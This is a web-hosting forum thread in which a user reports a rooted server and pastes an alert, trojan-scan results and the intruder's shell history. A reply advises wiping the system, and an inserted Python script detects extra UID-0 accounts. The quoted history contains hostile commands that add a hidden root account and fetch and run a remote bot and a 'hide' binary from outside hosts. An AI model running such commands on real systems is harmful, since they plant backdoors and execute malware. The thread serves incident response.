The Community Forums


Hacked?

Discussion in 'General Discussion' started by w00ts!te, Nov 29, 2007.

  1. w00ts!te

    w00ts!te Registered

    Joined:
    Nov 23, 2007
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    I got rooted.

    I have received this email:

    IMPORTANT: Do not ignore this email.
    This message is to inform you that the account lib has user id 0 (root privs).
    This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

    Syslogd and named are failing every 5 minutes, and certain things like disk space usage and connections aren't working in a program I use. What's the best thing to do?

    Few WHM Items:
    Scan for Trojan Horses
    Appears Clean

    /dev/core
    /dev/hdx1
    /dev/hdx2
    /dev/saux
    /dev/stderr
    Scanning for Trojan Horses.....

    Possible Trojan - /usr/bin/xmlcatalog
    Possible Trojan - /usr/bin/xmllint
    Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.la
    Possible Trojan - /usr/lib/python2.4/site-packages/libxml2mod.so
    Possible Trojan - /etc/cron.daily/logrotate

    And this is my history:
    58 last
    59 /sbin/ifconfig |grep inet
    60 /usr/sbin/useradd -o -u 0 -g 0 -d /usr/lib/libsh lib
    61 passwd lib
    62 cat /etc/hosts
    63 cat /etc/passwd
    64 su tf4
    65 su tf4
    66 cd /home/tf4
    67 ls
    68 pwd
    69 mkdir .cor ; cd .cor ; lwp-download http://members.lycos.co.uk/korekt/bot.txt ; perl bot.txt
    70 passwd mysql
    71 wget members.lycos.co.uk/acid4u/hide ; chmod +x hide ; ./hide

    What can I do? I got rooted big time.
     
    #1 w00ts!te, Nov 29, 2007
    Last edited: Nov 29, 2007
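As an added example (not cPanel's own check and not code from the poster), a small Python script that performs the kind of check behind the notice above: it parses /etc/passwd for accounts other than root that carry UID 0, and for login-capable accounts whose home directory sits under a system path such as the /usr/lib/libsh seen in the shell history. The passwd lines in the sample are constructed.

```python
"""Flag extra UID-0 accounts and oddly placed home directories in passwd data.

Added example: this is not cPanel's check. The sample passwd text below is
constructed to mirror the `useradd -o -u 0 -g 0 -d /usr/lib/libsh lib`
command from the post.
"""

import re

# Constructed sample: a normal root entry, a system account, a regular
# user, and the duplicate-UID-0 "lib" account created by the attacker.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
tf4:x:502:502::/home/tf4:/bin/bash
lib:x:0:0::/usr/lib/libsh:/bin/bash
"""

# Home directories under these trees are unusual for a login account.
SYSTEM_PREFIX = re.compile(r"^/(usr|lib|lib64|etc|dev|bin|sbin)(/|$)")


def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for each well-formed passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # skip comments, blanks and malformed lines
        name, _pw, uid, gid, _gecos, home, shell = fields
        yield name, int(uid), int(gid), home, shell


def find_rogue_uid0(text, allowed=("root",)):
    """Return names of UID-0 accounts that are not in the allowed set."""
    return [name for name, uid, _g, _h, _s in parse_passwd(text)
            if uid == 0 and name not in allowed]


def find_odd_homes(text):
    """Return (name, home) for login-capable accounts homed under a system path."""
    return [(name, home) for name, _u, _g, home, shell in parse_passwd(text)
            if SYSTEM_PREFIX.match(home)
            and not shell.endswith(("nologin", "false"))]


if __name__ == "__main__":
    # Run against the constructed sample; point this at /etc/passwd on a real host.
    print("extra UID-0 accounts:", find_rogue_uid0(SAMPLE_PASSWD))
    print("login accounts homed under system paths:", find_odd_homes(SAMPLE_PASSWD))
```

On a real system, pipe /etc/passwd into these functions and diff the result against a known-good baseline; a new UID-0 name or a home directory under /usr/lib is the signal the cPanel notice is reporting.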
  2. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    At this point, you definitely want to remove this account. Since the server was rooted, you can attempt to look through access logs to find out exactly how the attacker got this access, but it's hard to say what all was done and it's best to wipe the server and start with a clean OS install to ensure a clean system.
     